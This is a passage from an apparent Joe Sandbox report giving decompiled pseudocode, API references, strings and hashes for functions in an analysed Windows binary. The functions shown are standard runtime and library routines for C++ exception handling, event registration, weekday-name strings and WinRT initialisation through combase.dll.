																						}
																						_t234 = _t234 - 1;
																						_t228 = _t228 + 4;
																						__eflags = _t234;
																						if(_t234 > 0) {
																							continue;
																						} else {
																							_t218 = _v20;
																							_t189 = _v24;
																							_t221 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t228);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t206);
																					L67();
																					_t238 = _t238 + 0x30;
																				}
																				L43:
																				_t220 = _v16;
																				goto L44;
																				L40:
																				_t218 = _t218 + 1;
																				_t189 = _t189 + 0x10;
																				_v20 = _t218;
																				_v24 = _t189;
																				__eflags = _t218 - _v92;
																			} while (_t218 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t220 = _t220 + 1;
																_t182 = _v44;
																_t214 = _v32 + 0x14;
																_v16 = _t220;
																_v32 = _t214;
																__eflags = _t220 - _v56;
															} while (_t220 < _v56);
															_t222 = _a20;
															_t229 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E000DF3D0(_t206, _t222, _t229, __eflags);
														_t208 = _t206;
													}
													__eflags = ( *_t222 & 0x1fffffff) - 0x19930521;
													if(( *_t222 & 0x1fffffff) < 0x19930521) {
														L59:
														_t156 = L000F3D51(_t206, _t208, _t220, _t222, _t229);
														__eflags =  *(_t156 + 0x1c);
														if( *(_t156 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t222[7];
														if(_t222[7] != 0) {
															L52:
															_t161 = _t222[8] >> 2;
															__eflags = _t161 & 0x00000001;
															if((_t161 & 0x00000001) == 0) {
																_push(_t222[7]);
																_t162 = E000F4184();
																_t208 = _t206;
																__eflags = _t162;
																if(_t162 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *((intOrPtr*)(L000F3D51(_t206, _t208, _t220, _t222, _t229) + 0x10)) = _t206;
																_t170 = L000F3D51(_t206, _t208, _t220, _t222, _t229);
																_t210 = _v8;
																 *((intOrPtr*)(_t170 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t177 = _t222[8] >> 2;
															__eflags = _t177 & 0x00000001;
															if((_t177 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t206 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t206 + 0x14)) != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(L000F3D51(_t206, _t208, _t220, _t222, _t229) + 0x1c));
										_t200 = L000F3D51(_t206, _t208, _t220, _t222, _t229);
										_push(_v16);
										 *(_t200 + 0x1c) = _t229;
										_t201 = E000F4184();
										_t210 = _t206;
										if(_t201 != 0) {
											goto L23;
										} else {
											_t222 = _v16;
											_t258 =  *_t222 - _t229;
											if( *_t222 <= _t229) {
												L61:
												E000ED639(_t206, _t210, _t220, _t222, _t229, __eflags);
											} else {
												while(1) {
													_t210 =  *((intOrPtr*)(_t229 + _t222[1] + 4));
													if(L000F3F57( *((intOrPtr*)(_t229 + _t222[1] + 4)), _t258, 0x123db0) != 0) {
														goto L62;
													}
													_t229 = _t229 + 0x10;
													_t205 = _v20 + 1;
													_v20 = _t205;
													_t258 = _t205 -  *_t222;
													if(_t205 >=  *_t222) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t206);
											E000DF3D0(_t206, _t222, _t229, __eflags);
											_t208 =  &_v64;
											L000DED5C();
											E000DF35C( &_v64, 0x11ed44);
											L63:
											 *((intOrPtr*)(L000F3D51(_t206, _t208, _t220, _t222, _t229) + 0x10)) = _t206;
											_t164 = L000F3D51(_t206, _t208, _t220, _t222, _t229);
											_t208 = _v8;
											 *(_t164 + 0x14) = _v8;
											__eflags = _t229;
											if(_t229 == 0) {
												_t229 = _a8;
											}
											E000DF630(_t208, _t229, _t206);
											L000F3F34(_a8, _a16, _t222);
											_t167 = L000F3F4C(_t222);
											_t238 = _t238 + 0x10;
											_push(_t167);
											E000F421E(_t206, _t208, _t220, _t222, _t229, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x000f45c4
0x000f45cd
0x000f45d6
0x000f45dc
0x000f45e4
0x000f45e6
0x000f45e9
0x000f45ef
0x000f4968
0x000f4968
0x000f496d
0x000f4971
0x000f4975
0x000f4976
0x000f4979
0x000f497a
0x000f497b
0x000f497e
0x000f4980
0x000f4983
0x000f4984
0x000f4985
0x000f4988
0x000f498d
0x000f498d
0x000f4990
0x000f4993
0x000f4995
0x000f4997
0x000f4997
0x000f499d
0x000f49a2
0x000f49a5
0x000f49a7
0x000f49aa
0x000f49ad
0x000f49ae
0x000f49bc
0x000f49c1
0x000f49c6
0x000f49c9
0x000f49cc
0x000f49cf
0x000f49d2
0x000f49d3
0x000f49d6
0x000f49de
0x000f49e0
0x000f49e4
0x00000000
0x000f49e4
0x000f49ed
0x000f45fe
0x000f45fe
0x000f4607
0x000f4704
0x000f4704
0x000f4707
0x00000000
0x000f4636
0x000f4636
0x000f463b
0x00000000
0x000f4641
0x000f4641
0x000f4649
0x000f4906
0x000f4906
0x000f464f
0x000f4654
0x000f4657
0x000f465c
0x000f4663
0x000f4668
0x00000000
0x000f46a0
0x000f46a8
0x000f470c
0x000f470c
0x000f470f
0x000f4712
0x000f4714
0x000f4717
0x000f471a
0x000f4720
0x000f48d1
0x000f48d1
0x000f48d4
0x00000000
0x000f48d6
0x000f48d6
0x000f48d9
0x00000000
0x000f48df
0x000f48ef
0x000f48f4
0x00000000
0x000f48f4
0x000f48d9
0x000f4726
0x000f4726
0x000f472a
0x00000000
0x000f4730
0x000f4730
0x000f4737
0x000f474f
0x000f474f
0x000f4752
0x000f4755
0x000f476b
0x000f4770
0x000f4773
0x000f4776
0x000f4779
0x000f477c
0x000f477f
0x000f4782
0x000f4788
0x000f4788
0x000f478b
0x000f478e
0x000f479d
0x000f479e
0x000f479e
0x000f47a0
0x000f47a3
0x000f47a9
0x000f47ac
0x000f47b2
0x000f47b4
0x000f47b7
0x000f47ba
0x000f47c3
0x000f47c6
0x000f47c8
0x000f47c8
0x000f47cb
0x000f47ce
0x000f47d1
0x000f47d4
0x000f47d7
0x000f47dc
0x000f47dd
0x000f47de
0x000f47df
0x000f47e0
0x000f47e3
0x000f47e5
0x000f47e7
0x00000000
0x000f47e9
0x000f47e9
0x000f47f2
0x000f47f7
0x000f47fa
0x000f47fc
0x00000000
0x00000000
0x000f47fe
0x000f47ff
0x000f4802
0x000f4804
0x00000000
0x000f4806
0x000f4806
0x000f4809
0x000f480c
0x00000000
0x000f480c
0x00000000
0x000f4804
0x000f4820
0x000f4826
0x000f4829
0x000f482c
0x000f482f
0x000f4830
0x000f4835
0x000f4836
0x000f4839
0x000f483c
0x000f483f
0x000f4842
0x000f4843
0x000f4848
0x000f4848
0x000f484b
0x000f484b
0x00000000
0x000f480f
0x000f480f
0x000f4810
0x000f4813
0x000f4816
0x000f4819
0x000f4819
0x00000000
0x000f481e
0x000f47ba
0x000f47ac
0x000f484e
0x000f4851
0x000f4852
0x000f4855
0x000f4858
0x000f485b
0x000f485e
0x000f485e
0x000f4867
0x000f486a
0x000f486a
0x000f4782
0x000f486d
0x000f4871
0x000f4873
0x000f4876
0x000f487c
0x000f487c
0x000f4884
0x000f4889
0x000f48f7
0x000f48f7
0x000f48fc
0x000f4900
0x00000000
0x00000000
0x00000000
0x00000000
0x000f488b
0x000f488b
0x000f488f
0x000f48a1
0x000f48a4
0x000f48a7
0x000f48a9
0x000f48c0
0x000f48c4
0x000f48ca
0x000f48cb
0x000f48cd
0x00000000
0x000f48cf
0x00000000
0x000f48cf
0x000f48ab
0x000f48b0
0x000f48b3
0x000f48b8
0x000f48bb
0x00000000
0x000f48bb
0x000f4891
0x000f4894
0x000f4897
0x000f4899
0x00000000
0x000f489b
0x000f489b
0x000f489f
0x00000000
0x00000000
0x00000000
0x00000000
0x000f489f
0x000f4899
0x000f488f
0x000f4739
0x000f4739
0x000f4740
0x00000000
0x000f4742
0x000f4742
0x000f4749
0x00000000
0x00000000
0x00000000
0x00000000
0x000f4749
0x000f4740
0x000f4737
0x000f472a
0x000f46aa
0x000f46b2
0x000f46b5
0x000f46ba
0x000f46be
0x000f46c1
0x000f46c7
0x000f46ca
0x00000000
0x000f46cc
0x000f46cc
0x000f46cf
0x000f46d1
0x000f4907
0x000f4907
0x00000000
0x000f46d7
0x000f46df
0x000f46ea
0x00000000
0x00000000
0x000f46f3
0x000f46f6
0x000f46f7
0x000f46fa
0x000f46fc
0x00000000
0x000f4702
0x00000000
0x000f4702
0x00000000
0x000f46fc
0x000f46d7
0x000f490c
0x000f490c
0x000f490e
0x000f490f
0x000f4916
0x000f4919
0x000f4927
0x000f492c
0x000f4931
0x000f4934
0x000f4939
0x000f493c
0x000f493f
0x000f4941
0x000f4943
0x000f4943
0x000f4948
0x000f4954
0x000f495a
0x000f495f
0x000f4962
0x000f4963
0x00000000
0x000f4963
0x000f46ca
0x000f46a8
0x000f4668
0x000f4649
0x000f463b
0x000f4607

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 000F46C1
type_info::operator==.LIBVCRUNTIME ref: 000F46E3
___TypeMatch.LIBVCRUNTIME ref: 000F47F2
CatchIt.LIBVCRUNTIME ref: 000F4843
IsInExceptionSpec.LIBVCRUNTIME ref: 000F48C4
_UnwindNestedFrames.LIBCMT ref: 000F4948
CallUnexpected.LIBVCRUNTIME ref: 000F4963

Strings

csm, xrefs: 000F466E
csm, xrefs: 000F4601
csm, xrefs: 000F471A

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 82dcfda90cbbc304127bdf5ed8ad02be8fdd67b93d34da8eedb11b72a9983026
Instruction ID: 919522e69c5de5e23d48989a54dc437f2dbd53eb648a9b93de737306dc580184
Opcode Fuzzy Hash: 82dcfda90cbbc304127bdf5ed8ad02be8fdd67b93d34da8eedb11b72a9983026
Instruction Fuzzy Hash: 60B1777180020DAFCF68DFA4D8819BFBBB5BF04310B14416AEE156BA12D770DA51EB91

Uniqueness

Uniqueness Score: -1.00%

Function 000D9010 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 190libraryloaderCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 000D9035
EventRegister.ADVAPI32(00134C08,000D9180,00000000,00000018,?,?,?,?,00134C08,?,000D8FA4), ref: 000D90DA
GetModuleHandleExW.KERNEL32(00000000,api-ms-win-eventing-provider-l1-1-0.dll,FFFFFFFF), ref: 000D90F8
GetModuleHandleExW.KERNEL32(00000000,advapi32.dll,FFFFFFFF), ref: 000D910A
GetProcAddress.KERNEL32(FFFFFFFF,EventSetInformation), ref: 000D911C
FreeLibrary.KERNEL32(FFFFFFFF), ref: 000D9151

Strings

EventSetInformation, xrefs: 000D9114
api-ms-win-eventing-provider-l1-1-0.dll, xrefs: 000D90F1
advapi32.dll, xrefs: 000D9103

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: HandleModule$AddressEventFreeLibraryProcRegister_strlen
String ID: EventSetInformation$advapi32.dll$api-ms-win-eventing-provider-l1-1-0.dll
API String ID: 2182669159-147808218
Opcode ID: d47e53618836e980bc53c37191d5e005ce86cf2d750563f8104c4ddf6ed74977
Instruction ID: d8cf5e3d07b33a4f0e9d570dfc2a3c55017f6d258a5d3afe509020054ca5ec52
Opcode Fuzzy Hash: d47e53618836e980bc53c37191d5e005ce86cf2d750563f8104c4ddf6ed74977
Instruction Fuzzy Hash: CE51C17560430A9FDB288F15DC48EAB7BE9FF88350B15452AF84A97751D730EC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000911F0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E000911F0(void* __ebx, void* __fp0) {
				void* __edi;
				void* __esi;
				intOrPtr _t11;
				void* _t19;
				void* _t22;
				signed int _t23;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				void* _t61;

				_t61 = __fp0;
				_t22 = __ebx;
				_t11 =  *0x1264d4; // 0x0
				_t23 =  *0x123e38; // 0x0
				_t24 =  *((intOrPtr*)( *[fs:0x2c] + _t23 * 4));
				if(_t11 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t23 * 4)) + 4))) {
					L000DDC67(_t11, 0x1264d4);
					__eflags =  *0x1264d4 - 0xffffffff;
					if(__eflags == 0) {
						E000DDF39(_t24, __eflags, E000930D0);
						L000DDCDD(0x1264d4);
					}
				}
				E0009579C(0x12642c, L"Sunday", 6);
				E0009579C(0x126438, L"Monday", 6);
				E0009579C(0x126444, L"Tuesday", 7);
				E0009579C(0x126450, L"Wednesday", 9);
				E0009579C(0x12645c, L"Thursday", 8);
				E0009579C(0x126468, L"Friday", 6);
				_t19 = E0009579C(0x126474, L"Saturday", 8);
				if( *0x12648b < 0) {
					 *0x126484 = 3;
					_t42 =  *0x126480; // 0x0
				} else {
					_t42 = 0x126480;
					_t19 = L00092BC0(_t22, 0x126480, 8, 0x126480, _t61, 3);
				}
				 *_t42 = 0x750053;
				 *((intOrPtr*)(_t42 + 4)) = 0x6e;
				if( *0x126497 < 0) {
					 *0x126490 = 3;
					_t43 =  *0x12648c; // 0x0
				} else {
					_t43 = 0x12648c;
					_t19 = L00092BC0(_t22, 0x12648c, 8, 0x12648c, _t61, 3);
				}
				 *_t43 = 0x6f004d;
				 *((intOrPtr*)(_t43 + 4)) = 0x6e;
				if( *0x1264a3 < 0) {
					 *0x12649c = 3;
					_t44 =  *0x126498; // 0x0
				} else {
					_t44 = 0x126498;
					_t19 = L00092BC0(_t22, 0x126498, 8, 0x126498, _t61, 3);
				}
				 *_t44 = 0x750054;
				 *((intOrPtr*)(_t44 + 4)) = 0x65;
				if( *0x1264af < 0) {
					 *0x1264a8 = 3;
					_t45 =  *0x1264a4; // 0x0
				} else {
					_t45 = 0x1264a4;
					_t19 = L00092BC0(_t22, 0x1264a4, 8, 0x1264a4, _t61, 3);
				}
				 *_t45 = 0x650057;
				 *((intOrPtr*)(_t45 + 4)) = 0x64;
				if( *0x1264bb < 0) {
					 *0x1264b4 = 3;
					_t46 =  *0x1264b0; // 0x0
				} else {
					_t46 = 0x1264b0;
					_t19 = L00092BC0(_t22, 0x1264b0, 8, 0x1264b0, _t61, 3);
				}
				 *_t46 = 0x680054;
				 *((intOrPtr*)(_t46 + 4)) = 0x75;
				if( *0x1264c7 < 0) {
					 *0x1264c0 = 3;
					_t47 =  *0x1264bc; // 0x0
				} else {
					_t47 = 0x1264bc;
					_t19 = L00092BC0(_t22, 0x1264bc, 8, 0x1264bc, _t61, 3);
				}
				 *_t47 = 0x720046;
				 *((intOrPtr*)(_t47 + 4)) = 0x69;
				if( *0x1264d3 < 0) {
					 *0x1264cc = 3;
					_t48 =  *0x1264c8; // 0x0
				} else {
					_t48 = 0x1264c8;
					_t19 = L00092BC0(_t22, 0x1264c8, 8, 0x1264c8, _t61, 3);
				}
				 *_t48 = 0x610053;
				 *((intOrPtr*)(_t48 + 4)) = 0x74;
				return _t19;
			}

0x000911f0
0x000911f0
0x000911f5
0x000911fa
0x00091207
0x00091210
0x0009142a
0x00091432
0x00091439
0x00091444
0x00091451
0x00091456
0x00091439
0x00091226
0x00091236
0x00091247
0x00091258
0x0009126d
0x0009127d
0x0009128d
0x00091299
0x000912ae
0x000912b8
0x0009129b
0x0009129b
0x000912a7
0x000912a7
0x000912be
0x000912c4
0x000912d2
0x000912e7
0x000912f1
0x000912d4
0x000912d4
0x000912e0
0x000912e0
0x000912f7
0x000912fd
0x0009130b
0x00091320
0x0009132a
0x0009130d
0x0009130d
0x00091319
0x00091319
0x00091330
0x00091336
0x00091344
0x00091359
0x00091363
0x00091346
0x00091346
0x00091352
0x00091352
0x00091369
0x0009136f
0x0009137d
0x00091392
0x0009139c
0x0009137f
0x0009137f
0x0009138b
0x0009138b
0x000913a2
0x000913a8
0x000913b6
0x000913cb
0x000913d5
0x000913b8
0x000913b8
0x000913c4
0x000913c4
0x000913db
0x000913e1
0x000913ef
0x00091404
0x0009140e
0x000913f1
0x000913f1
0x000913fd
0x000913fd
0x00091414
0x0009141a
0x00091424

APIs

__Init_thread_header.LIBCMT ref: 0009142A

Strings

Sunday, xrefs: 00091221
Thursday, xrefs: 00091268
Friday, xrefs: 00091278
Monday, xrefs: 00091231
Tuesday, xrefs: 00091242
Wednesday, xrefs: 00091253
Saturday, xrefs: 00091288

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Init_thread_header
String ID: Friday$Monday$Saturday$Sunday$Thursday$Tuesday$Wednesday
API String ID: 3738618077-1471634407
Opcode ID: ccea478033bdcc6dca14258830a0c0bef9650453c6499fe8f600b18bad6aa0bf
Instruction ID: 96092bc03442d31cfafef1f52bed346f165cabaac474544e5a5d1fb1e083f62b
Opcode Fuzzy Hash: ccea478033bdcc6dca14258830a0c0bef9650453c6499fe8f600b18bad6aa0bf
Instruction Fuzzy Hash: EA51E270A053E1BBEB24BF40E925B993BA4A700714F00442CD5C92BBD2C7B529A6D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 000A1520 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E000A1520(void* __ecx, void* __fp0) {
				void* _v16;
				signed int _v24;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				intOrPtr _t17;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t26;
				signed int _t29;
				_Unknown_base(*)()* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t42;
				signed int _t43;
				void* _t45;
				void* _t46;

				_t45 = (_t43 & 0xfffffff0) - 0x30;
				_t40 = __ecx;
				_t11 =  *0x120014; // 0xf049169a
				_v24 = _t11 ^ _t42;
				_t13 =  *0x1269d4; // 0x0
				_t29 =  *0x123e38; // 0x0
				_t38 =  *[fs:0x2c];
				if(_t13 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t29 * 4)) + 4))) {
					_t13 = L000DDC67(_t13, 0x1269d4);
					_t46 = _t45 + 4;
					if( *0x1269d4 == 0xffffffff) {
						_t17 =  *0x1269dc; // 0x0
						_t34 =  *0x123e38; // 0x0
						_t38 =  *[fs:0x2c];
						if(_t17 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t34 * 4)) + 4))) {
							L000DDC67(_t17, 0x1269dc);
							_t46 = _t46 + 4;
							if( *0x1269dc == 0xffffffff) {
								asm("pcmpeqd xmm0, xmm0");
								asm("movdqa [esp+0x10], xmm0");
								_t27 = _t46;
								L000A4C80(_t46, "operator()", "..\\..\\base\\win\\scoped_winrt_initializer.cc", 0x19);
								_t39 =  &_v48;
								L000AB520(_t46,  &_v48, _t38, __fp0, _t27, 0x1269e0);
								_t26 = LoadLibraryExW(L"combase.dll", 0, 0x800);
								E000AB620(_t26,  &_v48, _t39, __fp0);
								 *0x1269d8 = _t26;
								L000DDCDD(0x1269dc);
								_t46 = _t46 + 0x14;
							}
						}
						_t19 =  *0x1269d8; // 0x0
						if(_t19 == 0) {
							_t20 = 0;
						} else {
							_t20 = GetProcAddress(_t19, "RoInitialize");
						}
						 *0x1269d0 = _t20;
						_t13 = L000DDCDD(0x1269d4);
					}
				}
				_t31 =  *0x1269d0; // 0x0
				if(_t31 == 0) {
					_t41 = 0x80004005;
				} else {
					 *0x137000();
					_t41 =  *_t31(_t40);
				}
				E000DE643(_t13, _t26, _v24 ^ _t42, _t38, _t39, _t41);
				return _t41;
			}

0x000a1529
0x000a152c
0x000a152e
0x000a1535
0x000a1539
0x000a153e
0x000a1544
0x000a1554
0x000a158c
0x000a1591
0x000a159b
0x000a159d
0x000a15a2
0x000a15a8
0x000a15b8
0x000a15ef
0x000a15f4
0x000a15fe
0x000a1600
0x000a1604
0x000a160a
0x000a1619
0x000a1621
0x000a162d
0x000a1644
0x000a1648
0x000a164d
0x000a1658
0x000a165d
0x000a165d
0x000a15fe
0x000a15ba
0x000a15c1
0x000a15d1
0x000a15c3
0x000a15c9
0x000a15c9
0x000a15d3
0x000a15dd
0x000a15e2
0x000a159b
0x000a1556
0x000a155e
0x000a156d
0x000a1560
0x000a1560
0x000a1569
0x000a1569
0x000a1578
0x000a1586

APIs

__Init_thread_header.LIBCMT ref: 000A158C
GetProcAddress.KERNEL32(00000000,RoInitialize), ref: 000A15C9
__Init_thread_header.LIBCMT ref: 000A15EF

Part of subcall function 000DDC67: EnterCriticalSection.KERNEL32(00123DF0,?,?,?,000B5D50,00133ED0,?,?,?,?,000B5B17,00000000,00000000), ref: 000DDC72
Part of subcall function 000DDC67: LeaveCriticalSection.KERNEL32(00123DF0,?,?,?,000B5D50,00133ED0,?,?,?,?,000B5B17,00000000,00000000), ref: 000DDCAF

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,?,001269E0,?,?,?,?,?,?,?,?,?,?,?), ref: 000A163E

Strings

combase.dll, xrefs: 000A1639
..\..\base\win\scoped_winrt_initializer.cc, xrefs: 000A160E
operator(), xrefs: 000A1613
RoInitialize, xrefs: 000A15C3

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: CriticalInit_thread_headerSection$AddressEnterLeaveLibraryLoadProc
String ID: ..\..\base\win\scoped_winrt_initializer.cc$RoInitialize$combase.dll$operator()
API String ID: 882557473-4077768022
Opcode ID: ebfbc1ad5b06772a0d790bec6eca87de1de980d05beb3f2e3f6b802d03e75a40
Instruction ID: a78b5fb71111aea0f9efb9cb9bee345fb2b80bbfa090a168c7e6924ddb9044e6
Opcode Fuzzy Hash: ebfbc1ad5b06772a0d790bec6eca87de1de980d05beb3f2e3f6b802d03e75a40
Instruction Fuzzy Hash: 68313971F04750EFD624EB74AC82BA93395EB96724F04013AF812976D2EF7099D1CB51

Uniqueness

Uniqueness Score: -1.00%

Function 000A1670 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 86
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E000A1670(void* __ebx, intOrPtr* __ecx, void* __fp0) {
				void* _v12;
				signed int _v16;
				char _v44;
				void* __edi;
				void* __esi;
				signed int _t12;
				intOrPtr _t16;
				struct HINSTANCE__* _t18;
				_Unknown_base(*)()* _t19;
				signed int _t29;
				_Unknown_base(*)()* _t31;
				signed int _t32;
				struct HINSTANCE__* _t37;
				signed int _t40;
				signed int _t41;
				void* _t43;
				void* _t45;

				_t25 = __ebx;
				_t43 = (_t41 & 0xfffffff0) - 0x30;
				_t12 =  *0x120014; // 0xf049169a
				_t13 = _t12 ^ _t40;
				_v16 = _t12 ^ _t40;
				 *__ecx = 0x10f078;
				if( *((intOrPtr*)(__ecx + 4)) >= 0) {
					_t13 =  *0x1269e8; // 0x0
					_t29 =  *0x123e38; // 0x0
					_t36 =  *[fs:0x2c];
					if(_t13 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t29 * 4)) + 4))) {
						_t13 = L000DDC67(_t13, 0x1269e8);
						_t45 = _t43 + 4;
						if( *0x1269e8 == 0xffffffff) {
							_t16 =  *0x1269dc; // 0x0
							_t32 =  *0x123e38; // 0x0
							_t36 =  *[fs:0x2c];
							if(_t16 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t32 * 4)) + 4))) {
								L000DDC67(_t16, 0x1269dc);
								_t45 = _t45 + 4;
								if( *0x1269dc == 0xffffffff) {
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x10], xmm0");
									L000A4C80(_t45, "operator()", "..\\..\\base\\win\\scoped_winrt_initializer.cc", 0x19);
									_t39 =  &_v44;
									L000AB520(__ebx,  &_v44, _t36, __fp0, _t45, 0x1269e0);
									_t37 = LoadLibraryExW(L"combase.dll", 0, 0x800);
									E000AB620(__ebx,  &_v44, _t37, __fp0);
									 *0x1269d8 = _t37;
									L000DDCDD(0x1269dc);
									_t45 = _t45 + 0x14;
								}
							}
							_t18 =  *0x1269d8; // 0x0
							if(_t18 == 0) {
								_t19 = 0;
							} else {
								_t19 = GetProcAddress(_t18, "RoUninitialize");
							}
							 *0x1269e4 = _t19;
							_t13 = L000DDCDD(0x1269e8);
						}
					}
					_t31 =  *0x1269e4; // 0x0
					if(_t31 != 0) {
						 *0x137000();
						_t13 =  *_t31();
					}
				}
				return E000DE643(_t13, _t25, _v16 ^ _t40, _t36, _t37, _t39);
			}

0x000a1670
0x000a1678
0x000a167b
0x000a1680
0x000a1682
0x000a1686
0x000a1690
0x000a1692
0x000a1697
0x000a169d
0x000a16ad
0x000a16d8
0x000a16dd
0x000a16e7
0x000a16e9
0x000a16ee
0x000a16f4
0x000a1704
0x000a173b
0x000a1740
0x000a174a
0x000a174c
0x000a1750
0x000a1765
0x000a176d
0x000a1779
0x000a1790
0x000a1794
0x000a1799
0x000a17a4
0x000a17a9
0x000a17a9
0x000a174a
0x000a1706
0x000a170d
0x000a171d
0x000a170f
0x000a1715
0x000a1715
0x000a171f
0x000a1729
0x000a172e
0x000a16e7
